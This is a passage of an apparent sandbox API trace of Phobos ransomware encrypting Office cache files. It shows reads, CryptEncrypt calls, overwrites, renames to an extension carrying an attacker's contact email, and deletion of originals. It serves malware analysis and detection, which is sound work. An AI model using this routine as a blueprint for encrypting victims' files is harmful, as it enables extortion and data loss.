[0152.199] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0152.199] ReadFile (in: hFile=0x15c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0152.659] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0152.659] ReadFile (in: hFile=0x15c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0152.702] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32c28) returned 1 [0152.702] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0152.703] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0152.710] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.710] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0152.710] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0152.727] SetEndOfFile (hFile=0x15c) returned 1 [0152.728] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0152.728] WriteFile (in: hFile=0x15c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0153.400] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0153.400] WriteFile (in: hFile=0x15c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0153.404] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0153.404] WriteFile (in: hFile=0x15c, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0153.405] CloseHandle (hObject=0x15c) returned 1 [0153.405] SetEvent (hEvent=0xe8) returned 1 [0153.406] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0153.406] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.415] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2511872) returned 1 [0153.415] CloseHandle (hObject=0x190) returned 1 [0153.415] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi")) returned 0x2020 [0153.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0153.416] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0153.416] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0153.416] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0153.416] ReadFile (in: hFile=0x190, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0153.436] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0153.436] ReadFile (in: hFile=0x190, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0153.462] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0153.462] ReadFile (in: hFile=0x190, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0153.512] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32c28) returned 1 [0153.512] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0153.513] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0060) returned 1 [0153.520] CryptDestroyKey (hKey=0xa32c28) returned 1 [0153.520] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0153.520] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0112, lpOverlapped=0x0) returned 1 [0153.539] SetEndOfFile (hFile=0x190) returned 1 [0153.539] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0153.539] WriteFile (in: hFile=0x190, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0153.541] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0153.541] WriteFile (in: hFile=0x190, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0153.562] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0153.562] WriteFile (in: hFile=0x190, lpBuffer=0x313014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313014a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0153.570] CloseHandle (hObject=0x190) returned 1 [0153.570] SetEvent (hEvent=0xe8) returned 1 [0153.571] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0153.571] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.574] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=8265165) returned 1 [0153.574] CloseHandle (hObject=0x188) returned 1 [0153.574] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab")) returned 0x2020 [0153.575] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0153.575] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0153.575] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0153.575] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0153.575] ReadFile (in: hFile=0x188, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0153.959] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0153.959] ReadFile (in: hFile=0x188, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0154.476] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0154.476] ReadFile (in: hFile=0x188, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0154.764] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32e28) returned 1 [0154.764] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0154.765] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0154.772] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.772] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0154.773] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0154.808] SetEndOfFile (hFile=0x188) returned 1 [0154.808] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0154.808] WriteFile (in: hFile=0x188, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0154.914] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0154.914] WriteFile (in: hFile=0x188, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0154.916] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0154.916] WriteFile (in: hFile=0x188, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0154.917] CloseHandle (hObject=0x188) returned 1 [0154.917] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0154.917] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0154.918] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=519584) returned 1 [0154.918] CloseHandle (hObject=0x188) returned 1 [0154.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 0x2020 [0154.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.918] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0154.918] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0154.918] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0154.918] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0154.958] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0154.958] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0154.958] ReadFile (in: hFile=0x188, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x7eda0, lpOverlapped=0x0) returned 1 [0155.224] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7edb0, dwBufLen=0x7edb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7edb0) returned 1 [0155.229] WriteFile (in: hFile=0x18c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7edb0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x7edb0, lpOverlapped=0x0) returned 1 [0155.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0155.243] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0155.243] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0155.243] CryptDestroyKey (hKey=0xa32d28) returned 1 [0155.243] WriteFile (in: hFile=0x18c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0155.244] CryptDestroyKey (hKey=0xa32de8) returned 1 [0155.244] CloseHandle (hObject=0x188) returned 1 [0155.244] CloseHandle (hObject=0x18c) returned 1 [0155.247] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 1 [0155.252] SetEvent (hEvent=0xe8) returned 1 [0155.252] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0155.252] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0155.253] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=655872) returned 1 [0155.253] CloseHandle (hObject=0x18c) returned 1 [0155.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 0x2020 [0155.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0155.253] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0155.253] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0155.253] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0155.253] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0155.254] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0155.254] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0155.254] ReadFile (in: hFile=0x18c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa0200, lpOverlapped=0x0) returned 1 [0155.571] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa0210, dwBufLen=0xa0210 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa0210) returned 1 [0155.581] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa0210, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa0210, lpOverlapped=0x0) returned 1 [0155.597] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0155.598] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0155.598] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0155.598] CryptDestroyKey (hKey=0xa32c68) returned 1 [0155.598] WriteFile (in: hFile=0x188, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0155.598] CryptDestroyKey (hKey=0xa32de8) returned 1 [0155.598] CloseHandle (hObject=0x18c) returned 1 [0155.598] CloseHandle (hObject=0x188) returned 1 [0155.598] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 1 [0155.604] SetEvent (hEvent=0xe8) returned 1 [0155.604] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0155.604] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0155.604] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3702272) returned 1 [0155.604] CloseHandle (hObject=0x188) returned 1 [0155.604] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all 